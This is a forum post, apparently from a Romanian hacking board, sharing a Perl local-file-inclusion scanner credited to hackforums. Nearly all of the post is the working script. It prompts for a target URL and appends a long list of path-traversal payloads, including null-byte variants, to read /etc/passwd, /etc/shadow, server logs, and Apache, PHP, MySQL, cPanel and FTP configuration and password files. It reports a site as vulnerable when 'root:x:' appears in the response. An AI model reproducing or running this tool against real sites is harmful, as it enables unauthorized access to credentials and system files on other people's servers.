Jump to content
Romania-

[Source] LFI Scanner [PERL]

By Romania-, in Programare

Recommended Posts

Romania- Newbie

Romania-

Posted
Posted 

#!/usr/bin/perl

#(crasher_1412@yahoo.com)

#

#special thanks: mywisdom,gunslinger(rock n rool man),flyff_666(root admin in devilzc0de,

#petimati,spykit(admin in irc.dal.net and irc.byroe.net #devilzc0de),gonzhack martin(my brother),7460(thanks for bcktrack 4)

#to be contributor

use LWP::UserAgent;

use HTTP::Request;

system('clear','cls');print "=======================================================\n";

print "= =\n";

print "= LFI_scanner v 0.1 =\n";

print "= ~[kiddies here makin trouble]~ =\n";

print "= =\n";

print "= e.g: input the site: www.memek.com/index.php?id= =\n";

print "= =\n";

print "===================bec0de contributor==================\n\n";

print '>';chomp($link = <STDIN>);if($link !~ /http:\/\//) { $link = "http://$link"; }

#httpd type scanprint "\n>press [enter] to check the version of httpd[...]\n";

$httpd =<STDIN>;

$host = $link;

$useragent = LWP::UserAgent->new;

$resp = $useragent->head($host);

print $resp->headers_as_string;print "\n>press [enter] to check the vulnerability in lfi[...]\n";

$start =<STDIN>;

@vuls = ('/etc/passwd',

'../etc/passwd',

'../../etc/passwd',

'../../../etc/passwd',

'../../../../etc/passwd',

'../../../../../etc/passwd',

'../../../../../../etc/passwd',

'../../../../../../../etc/passwd',

'../../../../../../../../etc/passwd',

'../../../../../../../../../etc/passwd',

'../../../../../../../../../../etc/passwd',

'../../../../../../../../../../../etc/passwd',

'../etc/passwd%00',

'../../etc/passwd%00',

'../../../etc/passwd%00',

'../../../../etc/passwd%00',

'../../../../../etc/passwd%00',

'../../../../../../etc/passwd%00',

'../../../../../../../etc/passwd%00',

'../../../../../../../../etc/passwd%00',

'../../../../../../../../../etc/passwd%00',

'../../../../../../../../../../etc/passwd%00',

'../../../../../../../../../../../etc/passwd%00',

'/etc/passwd',

'/etc/shadow',

'/etc/group',

'/etc/security/group',

'/etc/security/passwd',

'/etc/security/user',

'/etc/security/environ',

'/etc/security/limits',

'/usr/lib/security/mkuser.default',

'/apache/logs/access.log',

'/apache/logs/error.log',

'/apache/logs/access.log',

'/apache/logs/error.log',

'/apache/logs/access.log',

'/etc/httpd/logs/acces_log',

'/etc/httpd/logs/acces.log',

'/etc/httpd/logs/error_log',

'/etc/httpd/logs/error.log',

'/var/www/logs/access_log',

'/var/www/logs/access.log',

'/usr/local/apache/logs/access_ log',

'/usr/local/apache/logs/access. log',

'/var/log/apache/access_log',

'/var/log/apache2/access_log',

'/var/log/apache/access.log',

'/var/log/apache2/access.log',

'/var/log/access_log',

'/var/log/access.log',

'/var/www/logs/error_log',

'/var/www/logs/error.log',

'/usr/local/apache/logs/error_log',

'/usr/local/apache/logs/error.log',

'/var/log/apache/error_log',

'/var/log/apache2/error_log',

'/var/log/apache/error.log',

'/var/log/apache2/error.log',

'/var/log/error_log',

'/var/log/error.log',

'/var/log/httpd/access_log',

'/var/log/httpd/error_log',

'/var/log/httpd/access_log',

'/var/log/httpd/error_log',

'/apache/logs/error.log',

'/apache/logs/access.log',

'/apache/logs/error.log',

'/apache/logs/access.log',

'/apache/logs/error.log',

'/apache/logs/access.log',

'/apache/logs/error.log',

'/apache/logs/access.log',

'/apache/logs/error.log',

'/apache/logs/access.log',

'/apache2/logs/error.log',

'/apache2/logs/access.log',

'/apache2/logs/error.log',

'/apache2/logs/access.log',

'/apache2/logs/error.log',

'/apache2/logs/access.log',

'/apache2/logs/error.log',

'/apache2/logs/access.log',

'/apache2/logs/error.log',

'/apache2/logs/access.log',

'/logs/error.log',

'/logs/access.log',

'/logs/error.log',

'/logs/access.log',

'/logs/error.log',

'/logs/access.log',

'/logs/error.log',

'/logs/access.log',

'/logs/error.log',

'/logs/access.log',

'/etc/httpd/logs/acces_log',

'/etc/httpd/logs/acces.log',

'/etc/httpd/logs/error_log',

'/etc/httpd/logs/error.log',

'/usr/local/apache/logs/access_log',

'/usr/local/apache/logs/access.log',

'/usr/local/apache/logs/error_log',

'/usr/local/apache/logs/error.log',

'/usr/local/apache2/logs/access_log',

'/usr/local/apache2/logs/access.log',

'/usr/local/apache2/logs/error_log',

'/usr/local/apache2/logs/error.log',

'/var/www/logs/access_log',

'/var/www/logs/access.log',

'/var/www/logs/error_log',

'/var/www/logs/error.log',

'/var/log/httpd/access_log',

'/var/log/httpd/access.log',

'/var/log/httpd/error_log',

'/var/log/httpd/error.log',

'/var/log/apache/access_log',

'/var/log/apache/access.log',

'/var/log/apache/error_log',

'/var/log/apache/error.log',

'/var/log/apache2/access_log',

'/var/log/apache2/access.log',

'/var/log/apache2/error_log',

'/var/log/apache2/error.log',

'/var/log/access_log',

'/var/log/access.log',

'/var/log/error_log',

'/var/log/error.log',

'/opt/lampp/logs/access_log',

'/opt/lampp/logs/error_log',

'/opt/xampp/logs/access_log',

'/opt/xampp/logs/error_log',

'/opt/lampp/logs/access.log',

'/opt/lampp/logs/error.log',

'/opt/xampp/logs/access.log',

'/opt/xampp/logs/error.log',

'/Program Files\Apache Group\Apache\logs\access.log',

'/Program Files\Apache Group\Apache\logs\error.log',

'/apache/logs/error.log',

'/apache/logs/access.log',

'/apache/logs/error.log',

'/apache/logs/access.log',

'/apache/logs/error.log',

'/apache/logs/access.log',

'/apache/logs/error.log',

'/apache/logs/access.log',

'/apache/logs/error.log',

'/apache/logs/access.log',

'/apache/logs/error.log',

'/apache/logs/access.log',

'/logs/error.log',

'/logs/access.log',

'/logs/error.log',

'/logs/access.log',

'/logs/error.log',

'/logs/access.log',

'/logs/error.log',

'/logs/access.log',

'/logs/error.log',

'/logs/access.log',

'/logs/error.log',

'/logs/access.log',

'/etc/httpd/logs/acces_log',

'/etc/httpd/logs/acces.log',

'/etc/httpd/logs/error_log',

'/etc/httpd/logs/error.log',

'/var/www/logs/access_log',

'/var/www/logs/access.log',

'/usr/local/apache/logs/access_log',

'/usr/local/apache/logs/access.log',

'/var/log/apache/access_log',

'/var/log/apache/access.log',

'/var/log/access_log',

'/var/www/logs/error_log',

'/var/www/logs/error.log',

'/usr/local/apache/logs/error_log',

'/usr/local/apache/logs/error.log',

'/var/log/apache/error_log',

'/var/log/apache/error.log',

'/var/log/access_log',

'/var/log/error_log',

'/usr/local/apache/conf/httpd.conf',

'/usr/local/apache2/conf/httpd.conf',

'/etc/httpd/conf/httpd.conf',

'/etc/apache/conf/httpd.conf',

'/usr/local/etc/apache/conf/httpd.conf',

'/etc/apache2/httpd.conf',

'/usr/local/apache/conf/httpd.conf',

'/usr/local/apache2/conf/httpd.conf',

'/usr/local/apache/httpd.conf',

'/usr/local/apache2/httpd.conf',

'/usr/local/httpd/conf/httpd.conf',

'/usr/local/etc/apache/conf/httpd.conf',

'/usr/local/etc/apache2/conf/httpd.conf',

'/usr/local/etc/httpd/conf/httpd.conf',

'/usr/apache2/conf/httpd.conf',

'/usr/apache/conf/httpd.conf',

'/usr/local/apps/apache2/conf/httpd.conf',

'/usr/local/apps/apache/conf/httpd.conf',

'/etc/apache/conf/httpd.conf',

'/etc/apache2/conf/httpd.conf',

'/etc/httpd/conf/httpd.conf',

'/etc/http/conf/httpd.conf',

'/etc/apache2/httpd.conf',

'/etc/httpd/httpd.conf',

'/etc/http/httpd.conf',

'/etc/httpd.conf',

'/opt/apache/conf/httpd.conf',

'/opt/apache2/conf/httpd.conf',

'/var/www/conf/httpd.conf',

'/private/etc/httpd/httpd.conf',

'/private/etc/httpd/httpd.conf.default',

'/Volumes/webBackup/opt/apache2/conf/httpd.conf',

'/Volumes/webBackup/private/etc/httpd/httpd.conf',

'/Volumes/webBackup/private/etc/httpd/httpd.conf.default',

'/Program Files\Apache Group\Apache\conf\httpd.conf',

'/Program Files\Apache Group\Apache2\conf\httpd.conf',

'/Program Files\xampp\apache\conf\httpd.conf',

'/usr/local/php/httpd.conf.php',

'/usr/local/php4/httpd.conf.php',

'/usr/local/php5/httpd.conf.php',

'/usr/local/php/httpd.conf',

'/usr/local/php4/httpd.conf',

'/usr/local/php5/httpd.conf',

'/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf',

'/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf',

'/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf',

'/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php',

'/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php',

'/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php',

'/usr/local/etc/apache/vhosts.conf',

'/etc/php.ini',

'/bin/php.ini',

'/etc/httpd/php.ini',

'/usr/lib/php.ini',

'/usr/lib/php/php.ini',

'/usr/local/etc/php.ini',

'/usr/local/lib/php.ini',

'/usr/local/php/lib/php.ini',

'/usr/local/php4/lib/php.ini',

'/usr/local/php5/lib/php.ini',

'/usr/local/apache/conf/php.ini',

'/etc/php4.4/fcgi/php.ini',

'/etc/php4/apache/php.ini',

'/etc/php4/apache2/php.ini',

'/etc/php5/apache/php.ini',

'/etc/php5/apache2/php.ini',

'/etc/php/php.ini',

'/etc/php/php4/php.ini',

'/etc/php/apache/php.ini',

'/etc/php/apache2/php.ini',

'/web/conf/php.ini',

'/usr/local/Zend/etc/php.ini',

'/opt/xampp/etc/php.ini',

'/var/local/www/conf/php.ini',

'/etc/php/cgi/php.ini',

'/etc/php4/cgi/php.ini',

'/etc/php5/cgi/php.ini',

'/php5\php.ini',

'/php4\php.ini',

'/php\php.ini',

'/PHP\php.ini',

'/WINDOWS\php.ini',

'/WINNT\php.ini',

'/apache\php\php.ini',

'/xampp\apache\bin\php.ini',

'/NetServer\bin\stable\apache\php.ini',

'/home2\bin\stable\apache\php.ini',

'/home\bin\stable\apache\php.ini',

'/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini',

'/usr/local/cpanel/logs',

'/usr/local/cpanel/logs/stats_log',

'/usr/local/cpanel/logs/access_log',

'/usr/local/cpanel/logs/error_log',

'/usr/local/cpanel/logs/license_log',

'/usr/local/cpanel/logs/login_log',

'/usr/local/cpanel/logs/stats_log',

'/var/cpanel/cpanel.config',

'/var/log/mysql/mysql-bin.log',

'/var/log/mysql.log',

'/var/log/mysqlderror.log',

'/var/log/mysql/mysql.log',

'/var/log/mysql/mysql-slow.log',

'/var/mysql.log',

'/var/lib/mysql/my.cnf',

'/etc/mysql/my.cnf',

'/etc/my.cnf',

'/etc/logrotate.d/proftpd',

'/www/logs/proftpd.system.log',

'/var/log/proftpd',

'/etc/proftp.conf',

'/etc/protpd/proftpd.conf',

'/etc/vhcs2/proftpd/proftpd.conf',

'/etc/proftpd/modules.conf',

'/var/log/vsftpd.log',

'/etc/vsftpd.chroot_list',

'/etc/logrotate.d/vsftpd.log',

'/etc/vsftpd/vsftpd.conf',

'/etc/vsftpd.conf',

'/etc/chrootUsers',

'/var/log/xferlog',

'/var/adm/log/xferlog',

'/etc/wu-ftpd/ftpaccess',

'/etc/wu-ftpd/ftphosts',

'/etc/wu-ftpd/ftpusers',

'/usr/sbin/pure-config.pl',

'/usr/etc/pure-ftpd.conf',

'/etc/pure-ftpd/pure-ftpd.conf',

'/usr/local/etc/pure-ftpd.conf',

'/usr/local/etc/pureftpd.pdb',

'/usr/local/pureftpd/etc/pureftpd.pdb',

'/usr/local/pureftpd/sbin/pure-config.pl',

'/usr/local/pureftpd/etc/pure-ftpd.conf',

'-/etc/pure-ftpd.conf',

'/etc/pure-ftpd/pure-ftpd.pdb',

'/etc/pureftpd.pdb',

'/etc/pureftpd.passwd',

'/etc/pure-ftpd/pureftpd.pdb',

'/usr/ports/ftp/pure-ftpd/',

'/usr/ports/net/pure-ftpd/',

'/usr/pkgsrc/net/pureftpd/',

'/usr/ports/contrib/pure-ftpd/',

'/var/log/pure-ftpd/pure-ftpd.log',

'/logs/pure-ftpd.log',

'/var/log/pureftpd.log',

'/var/log/ftp-proxy/ftp-proxy.log',

'/var/log/ftp-proxy',

'/var/log/ftplog',

'/etc/logrotate.d/ftp',

'/etc/ftpchroot',

'/etc/ftphosts',

'/var/log/exim_mainlog',

'/var/log/exim/mainlog',

'/var/log/maillog',

'/var/log/exim_paniclog',

'/var/log/exim/paniclog',

'/var/log/exim/rejectlog',

'/var/log/exim_rejectlog');print ">start scaning[...]\n";

foreach $scan(@vuls){$url = $link.$scan;

$request = HTTP::Request->new(GET=>$url);

$useragent = LWP::UserAgent->new();

$response = $useragent->request($request);

if ($response->is_success && $response->content =~ /root:x:/) { $msg = Vulnerable;}

else { $msg = "Not Found";}print "$scan..........[$msg]\n";

}

Source : http://www.hackforums.net/showthread.php?tid=4198800

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...